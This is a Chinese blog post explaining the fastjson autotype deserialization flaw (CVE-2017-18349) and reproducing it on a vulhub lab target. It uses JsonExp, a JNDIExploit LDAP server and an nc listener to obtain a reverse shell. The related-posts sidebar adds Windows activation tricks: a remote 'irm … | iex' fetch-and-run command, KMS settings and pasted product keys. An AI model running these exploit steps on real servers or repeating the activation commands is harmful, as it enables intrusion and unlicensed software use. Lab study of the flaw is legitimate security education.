fastjson反序列化漏洞(CVE-2017-18349)

最新推荐文章于 2025-04-21 17:13:50 发布
最新推荐文章于 2025-04-21 17:13:50 发布
阅读量797 收藏 2
点赞数 1
分类专栏: 漏洞复现 Web安全 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rumil/article/details/133019275
版权

文章目录

fastjson

fastjson 是阿里巴巴开发的 java语言编写的高性能 JSON 库,用于将数据在 Json 和 Java Object之间相互转换。它没有用java的序列化机制,而是自定义了一套序列化机制。

提供两个主要接口:

JSON.toJSONString 和 JSON.parseObject/JSON.parse 分别实现序列化和反序列化

序列化

"JSON.toJSONString"是Java语言中com.alibaba.fastjson.JSON类提供的一个方法,用于将Java对象转换为JSON格式的字符串

User user = new User("John", "Doe", 30);
String jsonString = JSON.toJSONString(user);
System.out.println(jsonString);

假设User类具有以下属性和构造函数:

public class User {
    private String firstName;
    private String lastName;
    private int age;

    public User(String firstName, String lastName, int age) {
        this.firstName = firstName;
        this.lastName = lastName;
        this.age = age;
    }

    // 省略 getter 和 setter 方法
}

输出结果将是一个表示"user"对象的JSON字符串:

{"age":30,"firstName":"John","lastName":"Doe"}

FastJson 序列化操作

序列化

Student student = new Student();
student.setName("jack");
String jsonString = JSON.toJSONString(student, SerializerFeature.WriteClassName);   
	//漏洞的关键点在@type
String jsonString2 = JSON.toJSONString(student);
System.out.println(jsonString);
System.out.println(jsonString2);

img

反序列化

System.out.println("反序列化");
    String json_ser = "{\"@type\":\"com.company.Student\",\"name\":\"jack\"}";      		//payload 写在恶意类Student中。但是类在服务端,如何去创建,如何写payload
//String json_ser2 = "{\"name\":\"jack\"}";
Student stu = JSON.parseObject(json_ser2,Student.class,Feature.SupportNonPublicField);
    //Feature.SupportNonPublicField 获取类中的私有变量
Student stu2 = (Student) JSON.parseObject(json_ser2,Object.class,Feature.SupportNonPublicField);
System.out.println(stu.getClass());
System.out.println(stu2.getClass().getName());

/*
上述代码在fastjson中调用JSON.parseObject方法进行反序列化。它接受三个参数:要反序列化的JSON字符串,目标类型(可以是具体的类或Object.class),以及一些特性(此处使用Feature.SupportNonPublicField来支持读取私有字段)。
*/

———————————————————————————————————————————————————————————————————————————————————

在上述代码中,你声明了一个名为Student的类(不包含恶意代码),它具有name属性。然后,使用JSON.parseObject方法将JSON字符串json_ser2反序列化为Student对象。这将返回一个Student对象,你可以调用其相应的方法来访问属性和执行其他操作。

最后,通过打印stu.getClass()和stu2.getClass().getName(),你可以获取反序列化后对象的类名。

需要注意的是,如果在JSON字符串中存在其他字段,而目标类中没有相应的属性,将会被忽略。同时,为了正确使用fastjson库,请确保在项目的类路径中引入fastjson库。

序列化 String json_ser2 = “{“name”:“jack”}”;会报错

序列化 String json_ser = “{”@type":“com.company.Student”,“name”:“jack”}"; 不会报错

因此能够执行反序列化的根源定位在 @type

漏洞原理

fastjson就是为了知道传入的值是水果里的苹果类型还是水果里的苹果手机类型。加了autotype机制导致的。因为他为了知道是什么详细类型,每次都需要读取下@type导致的。

攻击者准备rmi服务和web服务,将rmi绝对路径注入到lookup方法中,受害者JNDI接口会指向攻击者控制rmi服务器,JNDI接口向攻击者控制web服务器远程加载恶意代码,执行构造函数形成RCE。

  1. fastjson 利用过程
    fastjson中,在反序列化的时候 jdk中 的 jdbcRowSetImpl 类一定会被执行,我们给此类中的 setDataSourcesName 输入恶意内容(rmi链接),让目标服务在反序列化的时候,请求rmi服务器,执行rmi服务器下发的命令,从而导致远程命令执行漏洞

  2. 恶意类怎么上传到服务端
    通过jndi在服务端创造一个有危害的类,目标服务器收到rmi的命令之后,就会加载这个jndi生成的恶意类

  3. fastjson rce的原理
    jdk 中的 jdbcRowSetImpl 类中的 setAutoCommit 方法中的 lookup方法中的 getDataSourcesName 参数输入可控

漏洞复现(CVE-2017-18349)

环境:kali linux

靶场:vulhub/fastjson

image-20230918164314498

访问靶场:

image-20230918164346611

DNSlog检测:

若出现dnslog回弹,可根据前面的编号去寻找对应的payload

JsonExp.exe -u http://192.168.100.134:8090/ -l vi7sp8.dnslog.cn	//DNSlog地址

编号.地址

image-20230918165910277

测试的payload:

image-20230918165056634

在DNSlog处查看回显:

image-20230918165822173

工具对应生成报告文件内容:

image-20230918165202639

LDAP检测,开启LDAP和HTTP服务:

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.100.1

开始监听端口,可加参数自定义端口,也可以使用默认端口。

image-20230918170029928

将DNSlog地址换成LDAP服务的地址和对应的端口

JsonExp.exe -u http://192.168.100.134:8090/ -l 192.168.100.1:1389

image-20230918170357651

此时LDAP服务器可收到路径信息,可根据路径信息来定位触发漏洞的payload

image-20230918170608979

查看检测生成的报告:

image-20230918170714084

复制请求包,使用burp抓包修改数据包,复制此数据包

发送给重发器进行备份

image-20230918170837950

复制此数据包:

image-20230918170923313

查看可用的payload内容:

image-20230918171029454

拿出其中一条,复制到payload1当中:

(如果不成功,可换其他的语句进行尝试)

image-20230918171206313

本地开启nc监听:

image-20230918171244994

发送数据包:

image-20230918171348901

此时LDAP服务器可收到相关的信息:

image-20230918171332993

反过来查看监听端是否反弹shell成功:

反弹shell成功

image-20230918171503762

以上涉及的工具地址:

JsonExp

JNDIExp

Win11密钥查看方法详解
mmoo_python的博客
10-10 6198
掌握如何查看Windows 11激活密钥是每位用户都应该具备的技能。无论是已激活还是未激活的情况,我们都可以通过本文介绍的方法找到所需的密钥。同时,我们也要时刻注意密钥的安全性和合法性,确保我们的系统能够稳定、安全地运行。希望本文能对你有所帮助,如果你有任何疑问或建议,请随时在评论区留言。
Win11 22H2跳过联网激活的四种实用方法
最新发布
nntxthml的博客
05-04 2757
Windows 11 22H2版本中,微软强化了系统激活机制,要求用户必须完成联网激活才能进入桌面。这一改动虽能提升系统安全性,却给需要离线验机或计划退换货的用户带来困扰。本文将系统梳理四种经过验证的跳过联网激活方案,涵盖命令行操作、注册表修改、启动盘制作及镜像定制等维度,助力用户灵活应对不同场景需求。
Window11新机激活步骤(零基础)
ericma12的博客
06-02 2万+
此文章介绍了在电脑生产厂商预装window 11的情况下,首次开机并联网激活的流程。如果担心拿到的电脑是翻新机,可以绕过OOBE直接进行硬件、屏幕的检查。因此特把激活流程、注意事项等分享出来。
新电脑Win11家庭中文版跳过联网激活方法(教程)
rtkj1122的博客
10-21 1万+
预装Windows11家庭中文版的新电脑,如何跳过联网激活;由于微软限制必须要联网激活,需要使用已有的微软账户登入或者注册新的微软账户后才可以继续开机使用,Windows11联网后系统会自动激活。下面介绍一下初次开机初始化电脑时如何跳过联网激活,操作步骤如下: 第一次开机初始化系统,配置完所在地区、输入法就到了联网界面,这个界面没有跳过联网的按钮方式,即使重新开机重启也无法跳过该联网界面,接下来我们进行联网激活跳过操作; 1、在连接网络界面,按键键盘快捷键【
win11家庭版升级专业版
m0_56383118的博客
04-21 737
2.到系统输入秘钥win+R,输入powershell,回车后输入irm massgrave.dev/get.ps1 | iex。1.先断网脱机输入以下秘钥J8WVF-9X3GM-4WVYC-VDHQG-42CXT,重启电脑。3.等待窗口弹出,选择[1]4.回到系统会显示激活成功。
Windows 11【1001问】查找Windows 11产品密钥的7种方法
WenZhongxiang
03-03 2372
随着Windows 11的普及,越来越多的用户开始关注如何查找自己的产品密钥。无论是为了重新安装系统、激活新设备还是备份重要信息,了解如何查询Windows 11产品密钥变得尤为重要。在本文中,我们将详细介绍7种实用的方法,帮助您轻松找到Windows 11的产品密钥。无论您是通过物理标签、订阅账户,还是利用命令行工具或第三方软件,这些方法都能满足不同场景下的需求。
windows11专业工作站版密钥
2301_76272092的博客
01-01 2万+
P3N9M-GWKM7-GBFPK-R94XY-R62RH
三种查看 Windows 11 产品密钥的方法总结
qq_57728300的博客
10-28 2万+
本文教你三种查看电脑 Windows 11 产品密钥的方法及具体的步骤。
win11 激活
谢伟光的博客
12-17 7191
首先是查看 win11 到期的命令。
windows系统激活需要密钥
2401_84162761的博客
10-03 2304
在使用Windows操作系统时,用户可能会遇到关于系统激活的问题。激活是确保您所使用的Windows版本为正版的过程,它可以帮助用户获得完整的功能体验和官方的支持服务。本文将介绍Windows系统激活的基本概念,以及是否需要密钥来完成激活过程。Windows系统激活是指验证您的Windows副本以确保它是正版软件的过程。通过激活,微软可以确认您的产品许可证是有效的,并允许您访问所有Windows的功能和服务。
windows11升级专业版
qiqi776532的博客
02-27 2万+
2.新建文件输入以下内容:(保存退出,后缀改为.bat,右击以管理员身份运行,然后会出现提示框,一路点确定就行,最后查看设置是否成功,windows11专业版)打开设置,复制windows11专业版密钥,我用的密钥是:82XM6-23JJG-44W4Q-W3QPQ-V9FY4。完成如图以下内容,等待关机重启进入第二步。3.到设置查看是否成功。
WIN 11 企业版LTSC 激活
sunshine_sean的专栏
04-01 7570
第二行slmgr /ipk M7XTQ-FN8P6-TTKYV-9D4CC-J462D 回车,提示激活成功。1、键盘按Win+S呼出搜索框,输入CMD,右键“命令提示符”,点击“以管理员身份运行”第一行slmgr/skms kms.03k.org 回车 提示设置成功,关闭。第三行slmgr/ato回车 等20秒,提示激活成功就OK了。
Wolfram Mathematica 12.x 全版本、全平台通用注册机 (亲测WIN10、MAC、Linux完美激活
06-07
Wolfram Mathematica 12.x 全版本、全平台(WIN\MAX\LINUX)注册机 目前亲测WIN好使,过几天测试MAC系统的! 安装好mathematica后,WIN系统 安装方法:双击解压文件夹内批处理文件-输入math id即可 *请勿直接双击.exe...
SQLPrompt_7.5.0.787Keygen各版本通用.7z
05-14
Keygen(密钥生成器)通常用于激活软件的全功能版本,但请注意,这里提到的"SQLPrompt_7.5.0.787Keygen各版本通用"可能涉及到未经授权的软件激活方式,这在法律上是不被允许的。 SQLPrompt的主要功能包括: 1. **...
【免费数据库管理工具DBeaver版本24.2.1】 win10系统安装包
09-23
一款免费开源的通用数据库管理工具和 SQL 客户端。 支持广泛的数据库系统,包括 MySQL、PostgreSQL、Oracle、SQL Server、DB2、SQLite 等主流数据库以及一些 NoSQL 数据库如 MongoDB 等。
win11安装Navicat15使用
weixin_45299895的博客
02-13 784
win1安装navicat15
windows11家庭版升级专业版
热门推荐
IU131313的博客
10-13 4万+
2.新建文件输入以下内容:(保存退出,后缀改为.bat,右击以管理员身份运行,然后会出现提示框,一路点确定就行,最后查看成功windows11专业版)打开设置,复制windows11专业版密钥,我用的密钥是:82XM6-23JJG-44W4Q-W3QPQ-V9FY4。完成如图以下内容,等待关机重启进入第二步。
Windows 11家庭版升级专业版全攻略
goodtime1998的博客
12-10 1万+
如果您希望从零开始,享受全新的安装体验,那么重装Windows 11专业版是个不错的选择,使用可靠的装机工具,如一键装机软件或“大白菜”等。借助Rufus等工具,将镜像文件写入U盘或硬盘分区,启电脑,并从您刚刚制作的启动介质启动。在激活页面中,输入您购买的Windows 11专业版产品密钥 ,系统将会自动验证密钥的有效性。对于熟悉命令行的用户,KMS激活是个不错的选择,首先,参考官方KMS激活文档,确保操作无误。或者,您也可以进入“设置”,点击“系统”,再找到并点击“激活”按钮。设置KMS服务器,例如。
VNWARE win11激活
weixin_56082067的博客
03-11 340
以管理员身份进入命令提示符。
win11专业版安装
01-08
Windows 11 Pro 是Microsoft Windows操作系统的专业版本之一,它针对企业和高级用户设计,提供了更多的管理选项和功能。以下是安装Windows 11 Pro的一般步骤: 1. **检查系统要求**:确保你的电脑满足Windows 11的专业版硬件需求,如64位处理器、足够的RAM(建议8GB以上),以及至少1TB的硬盘空间(SSD更佳)。 2. **获取安装媒体**:你可以从Microsoft Store购买并下载Windows 11 Pro ISO镜像文件,或者从官方授权渠道获取安装密钥和ISO。 3. **创建安装媒介**:可以使用Media Creation Tool工具制作USB启动盘或者DVD光盘。 4. **重启电脑**:将安装媒介插入电脑并重启,进入BIOS设置更改启动顺序以便从安装媒介引导。 5. **开始安装**:当电脑启动后,选择语言和键盘布局,然后按照屏幕提示进行下一步操作,包括许可条款接受、自定义安装等。 6. **输入产品密钥**:如果你有许可证密钥,此时需要输入,如果没有则可以选择“在线购买”或“试用30天”。 7. **分区和格式化磁盘**:选择是否保留现有数据,然后分配新硬盘的空间给Windows 11。 8. **安装过程**:等待安装程序完成,这可能需要一段时间,期间可能会有一些设置让你调整,比如激活选项和更新设置。 9. **首次登录**:安装完成后,创建新的管理员账户并设置密码,然后就可以开始使用Windows 11 Pro了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值